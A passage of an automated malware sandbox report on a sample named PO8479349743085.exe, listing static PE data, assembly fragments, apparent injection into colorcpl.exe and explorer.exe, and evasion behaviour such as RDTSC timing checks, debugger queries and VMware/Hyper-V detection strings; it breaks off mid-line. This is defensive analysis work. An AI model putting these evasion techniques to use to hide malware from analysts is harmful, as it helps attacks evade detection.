          Source: PO8479349743085.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: PO8479349743085.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: PO8479349743085.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: PO8479349743085.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: PO8479349743085.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: colorcpl.pdbGCTL source: PO8479349743085.exe, 00000004.00000002.304278393.0000000002F30000.00000040.00000001.sdmp
          Source: Binary string: colorcpl.pdb source: PO8479349743085.exe, 00000004.00000002.304278393.0000000002F30000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.290155438.000000000E320000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO8479349743085.exe, 00000000.00000003.255725673.0000000003180000.00000004.00000001.sdmp, PO8479349743085.exe, 00000004.00000002.303837549.00000000013DF000.00000040.00000001.sdmp, colorcpl.exe, 0000000E.00000002.484803195.000000000504F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO8479349743085.exe, colorcpl.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.290155438.000000000E320000.00000002.00000001.sdmp
          Source: PO8479349743085.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: PO8479349743085.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: PO8479349743085.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: PO8479349743085.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: PO8479349743085.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: PO8479349743085.exeStatic PE information: real checksum: 0x3096b should be: 0x5b4e0
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 0_2_00852CF6 push ecx; ret 0_2_00852D09
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0041C184 push dword ptr [2E33947Ah]; ret 4_2_0041C174
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0041C2FA push ecx; ret 4_2_0041C2FF
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0041C288 push CCFB6AF2h; ret 4_2_0041C2AB
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_004192B5 push eax; iretd 4_2_004192BF
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00414CED push ecx; ret 4_2_00414CEE
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0041AD55 push eax; ret 4_2_0041ADA8
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0041ADA2 push eax; ret 4_2_0041ADA8
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0041ADAB push eax; ret 4_2_0041AE12
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00414E09 pushfd ; ret 4_2_00414E39
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0041AE0C push eax; ret 4_2_0041AE12
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0041BF14 push dword ptr [2E33947Ah]; ret 4_2_0041C174
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00852CF6 push ecx; ret 4_2_00852D09
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0133D0D1 push ecx; ret 4_2_0133D0E4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04FAD0D1 push ecx; ret 14_2_04FAD0E4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0306C288 push CCFB6AF2h; ret 14_2_0306C2AB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_030692B5 push eax; iretd 14_2_030692BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0306C2FA push ecx; ret 14_2_0306C2FF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0306C184 push dword ptr [2E33947Ah]; ret 14_2_0306C174
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0306C8CA push cs; ret 14_2_0306C8D1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0306BF14 push dword ptr [2E33947Ah]; ret 14_2_0306C174
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0306AE0C push eax; ret 14_2_0306AE12
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_03064E09 pushfd ; ret 14_2_03064E39
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0306AD55 push eax; ret 14_2_0306ADA8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0306ADA2 push eax; ret 14_2_0306ADA8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0306ADAB push eax; ret 14_2_0306AE12
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_03064CED push ecx; ret 14_2_03064CEE
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PO8479349743085.exeRDTSC instruction interceptor: First address: 00000000004083C4 second address: 00000000004083CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO8479349743085.exeRDTSC instruction interceptor: First address: 000000000040875E second address: 0000000000408764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 00000000030583C4 second address: 00000000030583CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 000000000305875E second address: 0000000003058764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00408690 rdtsc 4_2_00408690
          Source: C:\Windows\explorer.exe TID: 6904Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 4144Thread sleep time: -38000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 0_2_00862535 FindFirstFileExW,0_2_00862535
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00862535 FindFirstFileExW,4_2_00862535
          Source: explorer.exe, 00000007.00000000.285531454.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000007.00000000.285531454.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000007.00000000.284472922.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000007.00000000.285180147.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000002.493962108.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000007.00000000.285531454.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000007.00000000.285531454.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000007.00000000.285928062.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000007.00000000.277377565.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000007.00000000.284472922.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000007.00000000.284472922.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000007.00000000.284472922.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\PO8479349743085.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\PO8479349743085.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00408690 rdtsc 4_2_00408690
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_004098F0 LdrLoadDll,4_2_004098F0
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 0_2_0085D0B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0085D0B2
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 0_2_00851B90 mov eax, dword ptr fs:[00000030h]0_2_00851B90
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 0_2_00851B90 mov eax, dword ptr fs:[00000030h]0_2_00851B90
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 0_2_008611AF mov eax, dword ptr fs:[00000030h]0_2_008611AF
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 0_2_00876323 mov eax, dword ptr fs:[00000030h]0_2_00876323
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 0_2_00876C94 mov eax, dword ptr fs:[00000030h]0_2_00876C94
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 0_2_00876CCF mov eax, dword ptr fs:[00000030h]0_2_00876CCF
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 0_2_00876D32 mov eax, dword ptr fs:[00000030h]0_2_00876D32
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 0_2_0085AF0B mov eax, dword ptr fs:[00000030h]0_2_0085AF0B
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_008611AF mov eax, dword ptr fs:[00000030h]4_2_008611AF
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00851B90 mov eax, dword ptr fs:[00000030h]4_2_00851B90
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00851B90 mov eax, dword ptr fs:[00000030h]4_2_00851B90
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0085AF0B mov eax, dword ptr fs:[00000030h]4_2_0085AF0B
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0131513A mov eax, dword ptr fs:[00000030h]4_2_0131513A
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0131513A mov eax, dword ptr fs:[00000030h]4_2_0131513A
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01304120 mov eax, dword ptr fs:[00000030h]4_2_01304120
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01304120 mov eax, dword ptr fs:[00000030h]4_2_01304120
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01304120 mov eax, dword ptr fs:[00000030h]4_2_01304120
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01304120 mov eax, dword ptr fs:[00000030h]4_2_01304120
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01304120 mov ecx, dword ptr fs:[00000030h]4_2_01304120
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_012E9100 mov eax, dword ptr fs:[00000030h]4_2_012E9100
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_012E9100 mov eax, dword ptr fs:[00000030h]4_2_012E9100
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_012E9100 mov eax, dword ptr fs:[00000030h]4_2_012E9100
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_012EC962 mov eax, dword ptr fs:[00000030h]4_2_012EC962
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_012EB171 mov eax, dword ptr fs:[00000030h]4_2_012EB171
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_012EB171 mov eax, dword ptr fs:[00000030h]4_2_012EB171
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0130B944 mov eax, dword ptr fs:[00000030h]4_2_0130B944
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0130B944 mov eax, dword ptr fs:[00000030h]4_2_0130B944
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013651BE mov eax, dword ptr fs:[00000030h]4_2_013651BE
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013651BE mov eax, dword ptr fs:[00000030h]4_2_013651BE
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013651BE mov eax, dword ptr fs:[00000030h]4_2_013651BE
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013651BE mov eax, dword ptr fs:[00000030h]4_2_013651BE
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013099BF mov ecx, dword ptr fs:[00000030h]4_2_013099BF
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013099BF mov ecx, dword ptr fs:[00000030h]4_2_013099BF
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013099BF mov eax, dword ptr fs:[00000030h]4_2_013099BF
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013099BF mov ecx, dword ptr fs:[00000030h]4_2_013099BF
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013099